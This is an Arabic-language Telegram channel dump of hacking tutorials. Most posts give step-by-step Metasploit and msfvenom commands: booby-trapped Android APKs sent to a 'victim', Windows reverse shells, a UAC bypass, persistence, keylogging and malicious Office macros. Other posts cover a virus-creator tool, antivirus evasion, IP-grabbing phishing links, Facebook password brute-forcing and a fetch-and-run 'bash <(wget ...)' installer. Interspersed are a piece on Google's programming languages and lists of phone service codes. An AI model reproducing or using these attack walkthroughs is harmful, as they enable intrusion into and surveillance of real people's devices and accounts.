افضل برامج وادوات
3.23K subscribers
30 photos
1 video
36 files
280 links
برامج مفيده للهكرز والمبرمجين وغيرهم
Download Telegram
بسم الله الرحمن الرحيم


شرحنا اليوم تثبيت اداة metasploit
في خطوات بسيطه

1- apt update && apt upgrade -y


2- pkg install git


3- gem install bundler


4- gem install bundle


5- pip install bundle

يلا هنا بعد تكتبو الاوامر 5 دي تجو تثبيتو اداة Tool-X ودي جو ليها أدوات كتيرة طبعا بتلاقي اداة ميتا جو ما بعرف رقم كم هي بس ثبتها من الأداة دي يلا بعد تثبتها

6- git clone https://github.com/Rajkumrdusad/Tool-X.git
نقوم ندخل على الأداة دي ونثبت ميتا

7- cd Tool-X


8- chmod +x install.aex


9- ./install.aex
يلا هنا كدا الأداة Tool-X اشتغلت معاك وبقولو ليك اختار الاداة عايزها بعد ما تختار ميتا بتتثبت معاك يلا اكتب الاوامر تحت دي


10- ./metasploit.sh
دي عشان تثبت الميتا بعد ما تنزلها

11- msfconsole
الأمر دا بفتح ليك ميتا
ما هي لغات البرمجة المستخدمة من قبل مبرمجي جوجل ؟



لنفترض أنك في يوم من الأيام تطمح للعمل في Google كمبرمج أو مطور برامج. ما هو السؤال الأول الذي سوف تسأله لنفسك؟ اكثر سؤال ستسأله هو ماهي لغات البرمجة التي تستخدمها Google داخليًا؟




من خلال معرفة الإجابة الصحيحة على هذا السؤال ، سوف تكون قادرًا على إعداد نفسك بشكل ملائم بحيث لا تشعر أنك في غير مكانك عندما تحصل على وظيفة في شركة التكنولوجيا العملاقة هذه.


طبعا هذه المعلومات تم جمعها من الأشخاص الذين يعملون في Google والمنتجات التي طورتها Google.والتي تكشف عن بعض المعلومات المتعلقة باللغات المستخدمة في Google داخليًا. فيما يلي بعض منها:


 1. C ++


أحد الأشياء التي تعطى الأولوية في Google هو الأداء. إنها لغة برمجة مثالية يمكن استخدامها للتعامل مع العديد من الخوادم . ويفضل أيضا C ++ لأنها محمولة . هذا يعني ببساطة أنه يمكن استخدامه على منصات وأجهزة مختلفة.


قد تكون تنوع استخدام C ++ سببًا آخر لاستخدامه في Google. ويمكن استخدامه لمجموعة واسعة من التطبيقات بما في ذلك الرسومات ثلاثية الأبعاد ، واجهة المستخدم الرسومية ، وتنفيذ عمليات حسابية معقدة  ...


2. بايثون


معظمنا يعرف بايثون . فهي لغة تتميز بالبساطة والمتانة والتنوع. من المحتمل أن هذه الميزات هي السبب في أنها من بين اللغات المفضلة التي تستخدمها Google داخليًا.


Python هي لغة رائعة للمبرمجين المبتدئين والمبتدئين في Google. يسمح لهم بتنفيذ عدد كبير من المهام التي تعتبر معقدة. وهي أيضًا لغة انتقال إلى أدوات البنية الأساسية. مرونة بيثون تجعلها الخيار الأمثل لمعالجة البيانات وإدارتها. يعطي امتيازات المبرمجين لإنشاء ملفات البيانات.  


يُعتقد أن محرك بحث Google مكتوب بـ Python. يتم استخدام نفس اللغة أيضًا لكتابة برامج تتبع الارتباطات والعناكب التي تستخدمها جوجل .


3. جافا


Java هي لغة برمجة راسخة موجودة منذ أكثر من 20 عامًا. ومن بين لغات البرمجة التي تستخدم بكثافة في جوجل. كما هو متوقع ، يمكن أن تكون تعددية استخدام Java أحد الأسباب التي تجعلها شائعة جدًا. يمكن استخدامه لبرمجة كل من الأجهزة وكذلك نظام التشغيل. على سبيل المثال ، يعتمد نظام التشغيل Android على جافا. Java أيضا فعالة جدا عندما يتعلق الأمر بتشغيل الخوادم.


عندما يتعلق الأمر بـ Google ، يتم استخدام Java بشكل أساسي للبرمجة وتطوير واجهة المستخدم. تتمتع جافا بدعم كامل من العديد من المكتبات.


3. جافا سكريبت


JavaScript هي لغة برمجة تستخدم في جعل مواقع الويب أكثر تفاعلية. يتم تصنيفها من بين أفضل اللغات المستخدمة في Google داخليًا. بالنظر إلى أن الشركة لديها العديد من المنتجات المستندة إلى الويب في السوق ، فإنه لا شك أن JavaScript هي إحدى اللغات التي يتم الاعتماد عليها.


خذ مثالاً على إعلانات Google. يتم تشغيلها بواسطة JavaScript. يتم استخدام اللغة أيضًا في الأجهزة المحمولة. لقد تم تحسين استخدام جافا سكريبت بواسطة Node.js وهي تقنية خادم قوية.


5. Golang 


Go ( Golang ) هي لغة برمجة مفتوحة المصدر ولدت مباشرة داخل Google. لهذا السبب ، فهي لغة شائعة الاستخدام داخل الشركة. تم تطوير اللغة لغرض تحسين إنتاجية البرامج في Google. وهذا يعني أن التنفيذيين في الشركة أرادوا مهندسيهم أن يفعلوا المزيد عند التطوير والبرمجة . لتحقيق ذلك ، يستخدم Golang الميزات القوية للغات الأخرى بينما يتجاهل في نفس الوقت نقاط ضعف تلك اللغات.


على سبيل المثال ، يستخدم Go مستوى ثابت وكفاءة C ++ بينما يأخذ في نفس الوقت إنتاجية وبساطة بايثون.


في الختام ، هذه هي من بين أعلى لغات البرمجة التي تستخدمها Google داخليًا. بصفتها شركة عملاقة في مجال التكنولوجيا ، تمنح Google مبرمجيها حرية استكشاف لغات البرمجة التي يحبونها. تلك التي ذكرتها هنا هي فقط من بين اللغات الاكثر شعبية. بخلاف ذلك ، هناك لغات أخرى يستخدمها المبرمجون في Google بلا شك.
👍3
اداة اكثر م̷ـــِْن 400اداة
DarkFly 400+ Tools

Installtion :

$ apt update

$ apt upgrade

$ apt install git

$ git clone https://github.com/Ranginang67/DarkFly-Tool

$ cd DarkFly-Tool

$ chmod +x *

$ sh install



$ DarkFly
👍1
هم الاكواد السرية الخاصة بالهواتف الذكية
اكواد سرية في هاتفك تقوم باشياء مهمة عليك معرفتها

3855#*2767* : يقوم بفرمتة هاتفك
#0228#* : معرفة المعلومات حول البطارية
#9900#*: إزالة الملفات المؤقتة
#0808#* : تغيير إعدادات usb
*#12580*369# : معرفة معلومات حول قطع الهاردوير
#1111#* : معرفة نوع إصدار service mode
#*#0* : مجموعة من اختبارات للهاتف
#2663#* : للتعرف على نسخة firmware وتحديثها
#34971539#* : للدخول إلى إعدادات الكاميرا
#0011#* : لمعرفة معلومات حولGSM

نوكيا NOKIA

تكتب في الشاشة الرئيسية
*#06# لفحص الرقم التسلسلي للجهاز IMEI (International Mobile Equipment Identity).

*#7780# استعادة ضبط المصنع.

*#67705646# مسح الشاشة.

*#0000# عرض إصدار البرنامج.

*#2820# عنوان جهاز البلوتوث.

*#746025625# حالة ساعة الشريحة SIM.

*#62209526# – عرض عنوان MAC لمحول الشبكة اللاسلكية WLAN. هذه الخاصية للأجهزة الحديثة التي تدعم شبكة لاسلكية مثل .N80

#pw+1234567890+1# عرض حالة القيود على الشريحة.

*#92702689# – عرض قائمة خفية (اختصار Warranty) بالمعلومات التالية
1. عرض الرقم التسلسلي.

عرض تاريخ الصنع بالشهر والسنة

عرض تاريخ الشراء إن وجد بالشهر والسنةMMYY

عرض تاريخ آخر عملية صيانة إن وجد (0000)

عرض العمر التشغيلي للهاتف

*#3370# – تفعيل (أو تعطيل) ترميز بيانات معزز EFR. يزيد من قوة الإشارة والاستلام على حساب البطارية

*#4720# – تفعيل أو تعطيل نصف معدل الترميز.
*#7370925538# عند نسيان كلمة مرور المحفظة في S60

سيتم حذف كافة بيانات المحفظة وسيطلب منك قبلاً كود القفل (الافتراضي 12345)

اضغط *#3925538# لحذف المحتويات وشفرة المحفظة.

*#7328748263373738# إعادة ضبط رمز الأمان (الافتراضي 12345). لأي جهاز نوكيا

لفك قفل مزود الخدمة: أدخل الشريحة، قم بتشغيل الجهاز واضغط سهم زيادة الصوت لثلاث ثواني، حتى يعطي رمز PIN. اضغط C، ثم اضغط * وحين تومض الرسالة، اضغط * مرة أخرى ثم 04PINPIN*PIN#

لتغيير مجموعة المتصل المغلقة (إعدادات – إعدادات الأمان – مجموعات المستخدم) إلى 00000 وسوف يصدر هاتفك نغمة الرسالة عندما تقترب من منطقة مراقبة السرعة بالرادار.

ٍعند ضبطه على 500 سوف يجعل هاتفك يوقف منبهات الأمان على مخارج المحلات. يعمل هذا المقلب مع بعض هواتف نوكيا.

اضغط 0 لبعض الوقت في الشاشة الرئيسية لفتح متصفح الواب.

سوني SONY

قائمة سوني الخفية: -> * <- <- * <- *

(-> معناها اضغط عصا الألعاب،, الأسهم إلى اليمين بينما <- تعني إلى اليسار.)

تعرض موديل الهاتف، معلومات البرنامج، الرقم التسلسلي IMEI، معلومات الإعدادات، حالة الشريحة، ساعة النظام، إجمالي وقت المكالمات وعناوين النص.

IMEI الرقم التسلسلي للجهاز: *#06#

حالة القفل: <- * * <-

اختصار إلى آخر المكالمات المطلوبة: 0#

اختصار لأرقام الشريحة: في القائمة الرئيسية اكتب رقماً ثم اضغط رمز المربع #

اختصار استعادة اللغة: اضغط اليسار < ثم 0000 ثم اليمين >

جالاكسي Galaxy

##4636## عن البطارية وإعدادات أخرى مثل GSM/CDMA

##8255## خدمة عرض Gtalk

##7780## استعادة إعدادات المصنع

##34971539## لعرض معلومات عن كاميرا الهاتف (توخى الحذر عند التنقل بين الخيارات)

##7594## تغيير مهمة زر القدرة Power.

##197328640## نظام الخدمة

*#197238640# نظام الخدمة

#0# نظام الفحص

*#06# عرض رقم IMEI

*#1234# عرض برنامج firmware الحالي للهاتف

##1472365## فحص GPS

*#0011# القائمة الخفية لنظام الشبكة

##0##* قائمة فحص الشاشة

*#7465625# نظام هندسي

*#3214789650# خدمة GPS

*#9900# نسخ بعض بيانات الذاكرة وسجلات أخرى لوسائط خارجية مثل بطاقة SD

27673855# مسح بيانات المصنع وإعادة ضبط البطاقة بعد التأكيد بالضغط على # استعمل هذا فقط عند الرغبة بمسح البيانات

##273283255663282##* نسخ احتياطي للوسائط

أكواد مصنعية جديدة

*#1234# (عرض إصدار SW PDA, CSC, MODEM)

#12580369# (معلومات SW & HW)

*#197328640# (نظام الخدمة)

*#0228# (قراءة ADC)

*#32489# (معلومات تشفير Ciphering)

*#232337#( عنوان بلوتوث Bluetooth Address)

*#232331# (نظام فحص البلوتوث)

*#232338# (عنوان كرت الشبكة اللاسلكية WLAN MAC Address)

*#232339# (نظام فحص WLAN)

*#0842# (نظام فحص الهزاز)

*#0782# (فحص الساعة للزمن الحقيقي)

*#0673# (نظام فحص الصوت)

#0# (نظام فحص عام)

*#2263# (اختيار نطاق RF)

*#9090# (إعدادات فحص)

*#7284# (نظام فحص التحكم USB I2C)

*#872564# (نظام التحكم USB)

*#4238378# (إعداد GCF)

*#0283# (التحم الراجع بالصوت)

*#1575# (قائمة GPS)

*#3214789650# (نظام فحص LBS)

*#745# (قائمة RIL Dump)

*#746# (قائمة Debug Dump)

*#9900# (نظام System Dump)

*#44336# (معلومات إصدار النظام)

*#7780# (وضع المصنع)

27673855# (وضع المصنع الشامل)

*#0289# (نظام فحص Melody)
👍2😁1
*#2663# (تحديث برنامج TSP / TSK)

*#03# (NAND Flash S/N)

*#0589# (نظام فحص مستشعر الضوء)

*#0588# (Proximity Sensor Test Mode)

#2732832553282# (Data Create Menu)

#273283255663282# (Data Create SD Card)

#3282727336*# (Data Usage Status)

*#7594# (Remap Shutdown to End Call TSK)

*#34971539# (Camera Firmware Update)

*#526# (WLAN Engineering Mode)

*#528# (WLAN Engineering Mode)

*#7412365# (Camera Firmware Menu)

*#07# (تاريخ الفحص)

*#3214789# (نظام فحص GCF)

*#272886# (اختيار الرد الآلي)

*#8736364# (قائمة تحديث OTA)

*#301279# (HSDPA/HSUPA Control Menu)

*#7353# (Quick Test Menu)

27674387264636# (Sellout SMS / PCODE view)

*#7465625# (View Phone Lock Status)

7465625638*# (Configure Network Lock MCC/MNC)

#7465625638# (Insert Network Lock Keycode)

7465625782*# (Configure Network Lock NSP)

#7465625782# (Insert Partitial Network Lock Keycode)

746562577*# (Insert Network Lock Keycode SP)

#746562577# (Insert Operator Lock Keycode)

746562527*# (Insert Network Lock Keycode NSP/CP)

#746562527# (Insert Provider Keycode)

#272imei#* شفرة المنتج ، يعمل على Froyo

اتش تي سي HTC

في الشاشة الرئيسية (بعض الهواتف تستبد المربع الأخير # برمز الاتصال، كما أن الأرقام الموجودة هنا تحمل غالباً حروف المصطلحات فمثلاً 778 هي نفسها PST لأن رمز P موجود مع الرقم 7 وS كذلك مع 7 وT مع 8)

##775# – اعدادات EPST/PRL – PRL

##786# – EPST – حالة القائمة

##3282# – EPST – قائمة برمجة البيانات (اسم المستخدم, متقدم, إستعادة, تمكين HFA, خادم DSA , وصلة MMSC)

##33284# – Debug – قائمة الفحص – (Debug Screen شاشة الفحص , Test Calls فحص المكالمات, RC Data بيانات , الصوت اختيار HDR/1X , خصوصية الصوتVoice Privacy, نغمات المفاتيح DTMF Set, نظام كوريا Korea Mode Set)

##3424# – Diagnostic الفحص – الاتصال مع الهاتف في بيئة الفحص

##2539# – EPST/A-Key – قائمة بيانات

##7738# – EPST/P_Rev – إصدار البروتوكول

##8626337# – EPST/Vocoder – نظام الترميز المعزز

##4772579# – إعادة ضبط خدمة الجي بي اس GPS

##72786# – استعادة DSA إلى وضع المصنع

##889# – تمكين TTY

##4636## – معلومات الهاتف

##UPST# – دليل المودم

##778# – EPST – برمجة متقدمة

##37872# – Full Speed USB Mode تمكين\تعطيل نظام السرعة القصوى للبيانات

##3386# – DDTM – تمكين\تعطيل

#0# – أداة فحص آمن

*#0011# قائمة الخدمة

*#0228# حالة البطارية

*#0283# حلقة مغلقة لحزمة بيانات المستقبل

*#0289# إعادة فحص ميلودي

*#0673# فحص ميلودي

*#0782# RTCTimeRead عرض الوقت (مع الثواني)

*#0842# فحص الهزاز

*#147852# الوصول إلى قوائم عديدة منها اتصالات CDMA DATA

*#1472365# GPS إعدادات

*#1575# قائمة خدمة

*#197328640# قائمة خدمة

*#232331# فحص بث البلوتوث

*#2454# تعطيل تنبيه ضعف البطارية

*#2580# قائمة خدمة

*#2663# فحص دقة شاشة اللمس

*#2664# إصدار برنامج شاشة اللمس

*#2664# تحديث البرنامج الرئيسي Firmware

#27672878# قائمة خدمة

*#32489# قائمة خدمة

*#3264# RAM إصدار الرام

#3282727336*# حالة التاريخ الحالي

*#369852# الوصول إلى قوائم عديدة منها اتصالات CDMA DATA

*#4238378# قائمة خدمة

#6984125# قائمة خدمة

*#7284# قائمة خدمة

*#745# Sec_RIL_Dump النسخ إلى ذاكرة الهاتف, مسح سجل ril , (نسخ SDcard وعرض سجل RIL), الخروج

*#7450# Phone Dump Mode تعطيل

*#7451# Phone Dump Mode تمكين

#7673855# تهيئة المصنع

*#7780# ضبط المصنع

*#9090# قائمة خدمة

*#9900# SysDump نسخ كاتالوج السجل/حالة التخزين المؤقت/dumpsys,تمكين سجل الفحص, نسخ سجل حالة فحص مراقبة التخزين المؤقت)
2👍1
رموز وأسرار أجهزة إل جي LG

بسم الله نبدأ ...

 قائمة الاختبار في أجهزة LG 

2945 ثم # ثم * ثم #

----------------------------------

اﻟـﮧۣۚجـﮧۣۜـوہۗكـﮧـۖرۧۛ اﻟﮧۣۚـعـﮧۣۜـمـہۗرانـﮧـۖيۧۛ 

 القائمةالخفية في أجهزة LG 

2945 ثم * ثم # ثم 0 ثم 1 ثم * ثم #

----------------------------------

 الرقم التسلسلي 

* ثم # ثم 0 ثم 6 ثم #

----------------------------------

 الرقم التسلسلي و السوفت وير لبعض الاجهزة 

* ثم # ثم 0 ثم 7 ثم #

----------------------------------

 اصدار السوفت وير  

* ثم 8 ثم 3 ثم 7 ثم 5

----------------------------------

 التحقق من cheksum  

* ثم 6 ثم 8 ثم 6 ثم 1

----------------------------------

 اختبار المصنع 

# ثم P ثم W ثم R ثم 6 ثم 6 ثم 8

----------------------------------

اﻟـﮧۣۚجـﮧۣۜـوہۗكـﮧـۖرۧۛ اﻟﮧۣۚـعـﮧۣۜـمـہۗرانـﮧـۖيۧۛ  🇾🇪

 قائمة Simlock (LG B1200)  

1 ثم 9 ثم 4 ثم 5 ثم # ثم * ثم 5 ثم 1 ثم 0 ثم 1

----------------------------------

 قائمة Simlock (LG 510W, 5200)  

2 ثم 9 ثم 4 ثم 5 ثم # ثم *ثم 5 ثم 1 ثم 0 ثم 1 ثم #

----------------------------------

 قائمة Simlock (LG 7020, 7010)  

2 ثم 9 ثم 4 ثم 5 ثم # ثم * ثم 7 ثم 0 ثم 0 ثم 0 ثم 1 ثم #

----------------------------------

 قائمة Sinlock (LG 500, 600) 

2 ثم 9 ثم 4 ثم 7 ثم # ثم *

----------------------------------

 سلسلة الأجهزة U81xx لمعرفة إصدار الجهاز بدون وجود بطاقة سيم SIM اختر SW Ver.info  

277634 ثم # ثم * ثم #

أو

 47328545454 ثم #

----------------------------------

 سلسلة الأجهزة U81xx لإجراء ضبط إعدادات المصنع بدون وجود بطاقة سيم SIM اختر Factory Reset  

277634 ثم # ثم * ثم #


أو

 47328545454 ثم #



      


اتمنى ان يكون قد نال اعجابكم و رضاكم

استودعكم الله

الى موضوع قادم ان شاء الله ..؛

👍3
طريقة تثبيت الميتاسبلويت في الترمكس (Termux) بعد تحديث الاخير للموقع الرسمي الخاص بها اصبحت تثبت تثبيتا مباشرا بأمرين فقط افتح تطبيق الترمكس اكتب سطر الاوامر حسب الترتيب


1_$ apt update && apt upgrade -y
انتضر تحديث الحزم

2_$ pkg install unstable-repo


3_$ pkg install metasploit

بعد كتابة امر التبيت الميتاسبلويت Metasploit
ستنتظر قليلا حسب سرعة الانترنت لديك

لتشغيل الميتاسبلويت نستعمل الامر

msfconsole
السلام عليكم ورحمة الله وبركاته
اليوم سوف اشرح لكم طريقه صنع فايروس قوي
عبر أداة viruscreater


 طريقه تثبيتها:::-


الاوامر

1-  git clone https://github.com/ERROR4317/viruscreater

2-  cd viruscreater

أمر التشغيل


3- python2 virus.py



انا اخترت رقم 2

صناعه فيروسات قويه و ب انواع مختلفه



#CS
 
👍1
السلام عليكم ورحمة الله
سوف اقدم لكم طريقه اختراق الاندرويد عبر اداتي
الميتا و النجروك


اول خطوة هي فتح النجروك  ملحوظه قمت بفتح بورت 4444
ls

./ngrok tcp 4444



ثاني خطوة نفتح صفحه جديدة ونكتب هذي الأوامر بالترتيب



ls


cd metasploit-framework

./msfvenom -p android/meterpreter/reverse_tcp LPORT=4444 LHOST=الاي بي  R> /sdcard/SAJA.apk


(ملحوظه مهمه ممكن نستخدم  ال LHOST و LPORT  التعطيك ياها  النجروك )

الخطوة التاليه هي فتح الميتا بنفس الصفحه عن طريق الأمر
./msfconsole
بعد تفتح الأداة اكتب الأوامر بالترتيب


use exploit/multi/handler

set PAYLOAD android/meterpreter/reverse_tcp

set lport 4444

set lhost الاي بي

exploit

بعدها نروح  الى ذاكرة الجهاز الداخليه نجد ملف اسمه

SAJA.apk

نقوم بارساله الي الضحيه و ننتظر  حتي يقوم الضحيه بتثبيته


بعدها راح يفتح لنا جلسه اختراق
ونقوم بكتابه أوامر التحكم لمعرفتها نكتب
help , -h , ?


#CS
‏اداة لتخطي مكافحات الفيروسات
الاداة قادرة على إنشاء FUD(او بالمعنى العربي كلين)
قابل للتنفيذ حتى مع اشهر بايلودات الميتاسبلويت

$ get clone https://github.com/oddcod3/Phantom-Evasion
$ sudo chmod +x phantom-evasion.py
$ sudo ./phantom-evasion.py
السلام عليكم ورحمة الله
شرحي اليوم مميز شوي هو عن أداة PhoneInfoga
و ظيفتها جلب معلومات عن رقم معين ....


أوامر تثبيتها


 
git clone https://github.com/sundowndev/PhoneInfoga

cd PhoneInfoga

python3 -m pip install -r requirements.txt


أوامر تشغيلها

python  phoneinfoga.py -n  2490000000000

بعد كتابه هذا الأمر يطلع لك الأوامر الأساسية للرقم





سأترك لكم بقيه الأوامر لاكتشافها
 
optional arguments:
  -h, --help            show this help message and exit
  -n number, --number number
                        The phone number to scan (E164 or international
                        format)
  -i input_file, --input input_file
                        Phone number list to scan (one per line)
  -o output_file, --output output_file
                        Output to save scan results
  -s scanner, --scanner scanner
                        The scanner to use
  --osint               Use OSINT reconnaissance
  -u, --update          Update the project
  --no-ansi             Disable colored output
  -v, --version         Show tool version






#CS
👍1
السلام عليكم ورحمة الله وبركاته
شرح اليوم عن جلب ip الضحيه عبر طرق مختلفه
هنالك أكثر من 5 طرق لجلب ip الضحيه سوف اشرح لكم طريقتين منهما

الطريقه الاولي عن طريق أداة T-HOST
 و الثانيه عن طريق أداة تصنعها بنفسك و هذي اضمن من أداة T-HOST


بسم الله نبدا


الطريقه الاولي   أداة T-HOST

أوامر تثبيتها


apt install git

git clone https://github.com/Bhai4You/T-Host

cd T-Host

chmod +x requirement.sh 127.0.0.1.sh

 bash requirement.sh
أوامر تشغيل الأداة



bash 127.0.0.1.sh


و بعدها راح يطلب منك اسم للصورة مثلا راح يكون

Cs.jpg

و بعدها راح يقول لك اعطي اسم للصفحة تبعك اختار اي اسم تريد
Cs

و بعدها راح يطلب حجم و عرض للصورة اختر الحجم المناسب لك


و بعدها راح تدخل ip تبعك و البورت المناسب انا اخترت 4444

و بعدها اضغط انتر و استني راح يطلع لكم رابط مثل هذا https://pactus.serveo.net
تقم بارساله للضحيه  من غير إغلاق أداة T-HOST

 بعد ما الضحيه يدخل عليه يتم جلب ip تبعه


 

#CS
👍1
السلام عليكم ورحمة الله وبركاته

الطريقه الثانيه ..
بسم الله نبدأ. ...

اولا راح نثبت الأمر php
pkg install php
اول خطوة راح نشي ملف داخل الهوم تبع termux ب اسم CS


mkdir CS
بعدها لو كتبت ls
راح يظهر لك ملف ب اسم CS مع الأدوات تبعك


ثانيا ....
راح ننشي ملف index بداخل ملف CS
اولا راح ندخل ملف CS عبر الأمر
cd CS
بعدها
nano index.html
راح يفتح لنا صفحه راح نكتب بداخلها وسم html


<html>
<head>
<title>مرحبا بكم في مجر الظلام </title>
</head>
<body bgcolor='blue'>
<center>
<img src='mama.jpg' width='100' height='100' />

</center>
<font color=red size='10px' face='tahoma'>
<h1> <p align='center'> <b>you are hacked by saja <br> </h1>
<font color=white size='10px' face='tahoma'>
<h3> <p align=center> مرحبا بكم في مجر الظلام </h3>
<h3>معكم <p align=center> CS<b> </h3>
</body>
</html>
بعدها نعمل حفظ



الحين راح نجلب الصورة تبعنا من ال  sdcard
اولا راح نضع الصورة مع الملفات mama.jpg

ونكتب
cd /sdcard
و بعدها
cp mama.jpg/$HOME/CS

كدا بقي عندنا صورة وملف html


كدا انا أنشأت index حقي

ح انقل أو نسخ  ملف CS كلو الي الذاكرة

mv CS /sdcard


لو فتحت الذاكرة الداخليه ح تلقي الملف اتنقل وبداخله
صورة و ملف html

نرجع termux

php -S  127.0.0.1:2340 -t /sdcard/CS
بظهر ليك رابط نسخ و أرسله للضحية







#CS
👍1
استغلال بعض ثغرات MetaSploit 💻

____________________________________________

أختراق Windows عن طريق Power Shell باستغلال ثغرة web_delivery

+) ماهو Power Shell ؟
هو عبارة عن أمر او مجموعة من الأوامر التنفيذية التي تكتب في cmd او ما يسمى موجه الأوامر " أمتداده يكون bat ويمكن تحويله إلى ملف بأمتداد exe "

+) أوامر الأستغلال ~>

$ msfstart
$ msfconsole
$ use exploit/multi/script/web_delivery
$ show targets
$ set target <Numper Target>
$ set payload windows/meterpreter/reverse_tcp
$ set LHOST <ip>
$ set LPORT <port>
$ show option
$ exploit
$ session -i
$ session -i <Numper Session>

____________________________________________

تخطي UAC باستغلال ثغرة ASK

+) ماهو UAC ؟
هو عبارة عن صلاحيات الأدمن داخل جهاز الضحية

+) أوامر الأستغلال ~>

$ use exploit/windows/local/ask
$ set LHOST <ip>
$ set LPORT <port>
$ set session <numper session target>
$ set TECHNIQUE < PSH / EXE >
$ exploit
$ getsystem
$ run post/windows/gather/win_prives

____________________________________________

استغلال ثغرة s4u لتثبيت الضحية و حقن البايلود في جميع يوزر الضحية

+) أوامر الأستغلال ~>

$ use exploit/windows/local/s4u_persistence
$ set session <numper session target>
$ set TRIGGER <even,lock,logon,schedule,unlock>
$ set LPORT <port>
$ exploit

____________________________________________

اختراق الأجهزة بإستخدام سكربت بلغة الباثيون


+) صنع السكربت الملغم ~>

$ msfvenom -f raw -p python/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -o <name>.py


+) أوامر الأستغلال ~>
$ use exploit/multi/handler
$ set payload python/meterpreter/reverse_tcp
$ set LHOST <ip>
$ set LPORT <port>
$ exploit

_____________________________________________

اختراق الاندرويد عن طريق بايلود apk ملغم

+) صنع بايلود ملغم ~>

$ msfvenom -p android/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -o <name>.apk


+) الأستغلال ~>

$ use exploit/multi/handler
$ set payload android/meterpreter/reverse_tcp
$ set LHOST <ip>
$ set LPORT <port>
$ exploit -x hide_app_icon

_____________________________________________
التنصت على لوحة مفاتيح الضحية

+) أوامر الأستغلال ~>

$ use post/windows/capture/keylog_recorder
$ set session <numper session target>
$ exploit

____________________________________________


نقل عملية الاختراق داخل proceess عند قتل البايلود

+) أوامر الأستغلال ~>

$ use payload/windows/meterprerter/reverse_tcp
$ show advanced
$ set prependmigrate true
$ set prependmigrateproc svchost.exe
$ set LHOST <ip>
$ set LPORT <port>
$ generate -t exe -f <path>
____________________________________________

تلغيم ملفات Microsoft Offic

+) أمر تلغيم ~>

$ mafvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f vba-exe

+) أوامر الأستغلال ~>
$ use exploit/multi/handler
$ set payload windows/meterpreter/reverse_tcp
$ set LHOST <ip>
$ set LPORT <port>
$ exploit
____________________________________________
👍1
تحميل سكريبت Fsociety
على Termux

المستخدم في مسلسل mr.robot
تحتوي على عده اقسام مهمه

#الاوامر

apt install git python2

git clone https://github.com/Manisso/fsociety

cd fsociety

bash <(wget -qO- https://git.io/vAtmB)

./install.sh

python2 fsociety.py
شرح اختراق الفيسبوك بالتخمين"
1⃣| apt update

2⃣| apt upgrade

3⃣| apt install python

4⃣| apt install python2

5⃣| apt install git

6⃣| git clone https://github.com/Gameye98/Lazymux.git

7⃣| ls

8⃣| cd Lazymux

9⃣| ls

🔟| chmod 777 lazymux.py

1⃣1⃣| python2 lazymux.py

اكتب رقم 3 وانتر وبعدين
اكتب 00 وانتر وبعدين
اكتب 4 وانتر وبعدين
اكتب 2 وانتر
من يخلص
اكتب
✔️ | ls
افتح نافذة جديدة
ملاحظة النافذة الجديدة تسحب الشاشة من جهت اليسار الى اليمين وبعدين اضغط على الكتابة الي ع اليمنة

واكتب
✔️ | ls

1⃣| cd facebook-brute

2⃣| ls

3⃣| chomd +x facebook.py

4⃣| python2 facebook.py


رح يطلب منك ايدي ID حساب الضحية تخلي
شلون اطلع الايدي تروح للصفحة الضحية اسوي نسخ رابط الضحية
وبعدين تجي تحطة بهذا الموقع وادوس ليكل ويب وتنزل لي جوا راح تلكة ارقام بل لون الاحمر سويلها نسخ وروح حطها بل برنامج ودوس انتر
بعدين يطلب منك موقع ملف الباسورد تخلي

-
5⃣| password.txt

☑️ | رح يبدأ التخمين موفقين 🔅
1👍1😱1
أسرع اداة على الأطلاق لأنشاء لستة باسوورد:-
$ apt update
$ apt upgrade
$ apt install git
$ apt install python
$ apt install python2
$ git clone https://github.com/UndeadSec/GoblinWordGenerator
$ cd GoblinWordGenerator
$ chmod +x *
لتشغيل الأداة فقط اكتب هذا الأمر👇
$ python3 goblin.py
شرح عن الأداة
بعدها رح يظهر لك هذه الاوامر
هنا يطلب منك ان تحدد عدد الأرقام او الأحرف
اذا اردت 6 ارقام او حروف مثلا تكتب 6:6 وهكذا.
[!] provide a size scale [eg: "1 to 8" = 1:8] :
👍1
أّلََّسلَأّمَ عٌلَيِّګمَ وِرحٌمَةّ أّلَلَهِ وِبِرګأّتّةّ الًيَوُمًِ معنا شرح تثبيت كل ادواة الكالي لينكس علـّۓ برنامج gnuroot وبرنامج VNC Viewer الشرح راح يكون بسبط باذن •اللّـہ̣̥ اول خطوه نقوم
تابعو معي اول خطوه
بفتح gnuroot ونقوم
بضغط على x term
وننتظر حتى يقوم التثبيت التلقائي وبعد مايخلص التثبيت
نقوم بكتابه الامر التالي
بعد التثبيت نكتب ه̷̷َـَْـُذآ الامر
تابع
الان راح يتثبت معك أذأ لم
apt-get update
وعند الانتها نكتب الامر الثاني الذي هوا
apt-get upgrade
وبعدها راح يوقف يطلع ڵـڱ. n/y اكتب حرف
y
واصل التثبيت حتى يخلص معك التثبيت في الامر المهم
apt-get install lxde
راح يثبت ويخذ وقت 30دقيقه أذأ كانت الشبكة لديك قويه يحمل ملفات وحد جيجا بايت
وبعد الانتهاء م̷ـــِْن التثبيت
نكتب الامر الاخير
apt-get update
أذأ تم التثبيت الاومر تابع معي
الان نروح VNC Viewer
الامر الثاني

نكتب 127.0.0.1:51
والاسم اي شي تريد
وكلمة السر هيا
gnuroot

الان فتح معانا وجهت لينكس تابع معي. الان نستطيع استخدام لينكس
وان شاءالله الشرح القادم راح يكون تثبيت جميع ادوات كااي لينكس وشكرا تحياتي لكم الشرعبي
في خطوه مهمة راح اشرحها قبل الاكتمال والي هنا ينتهي الشرح شكر ليـّۓ المتابعة الي لقاء في شرح ٱڅڑ


apt-get update
apt-get upgrade
apt-get install lxde
apt-get update
ثم تضغط على x term
ثم تفتح Vnc





127.0.0.1:51
gnuroot
الباسورد هم gnuroot
____________
1👍1
فتح قائمة Staret ... ومنها Run ... كتابة الأمر CMD ... ضغط مفتاح Enter من لوحة المفاتيح

ستفتح لك قائمة CMD التى سيتم كتابة الأوامر بها
ipconfig

يستخدم هذا الأمر لمعرفة الـ IP و MASK و GATEWAY الخاصة بالجهاز الذى يتم كتابة هذا الأمر عليه .

و لو كتب الامر بالشكل التالى ipconfig /all ........... فسيتم معرفة ما سبق بالإضافة إلى الـ DSN و

MAC الخاصة الذى يتم كتابة هذا الأمر عليه .



GETMAC

يستخدم الأمر GETMAC للحصول على الـ MAC Address لكارت الشبكة الخاص
بالجهاز الذى ينفذ عليه هذا الأمر .


************
@hackteep*********************

أمر Ping

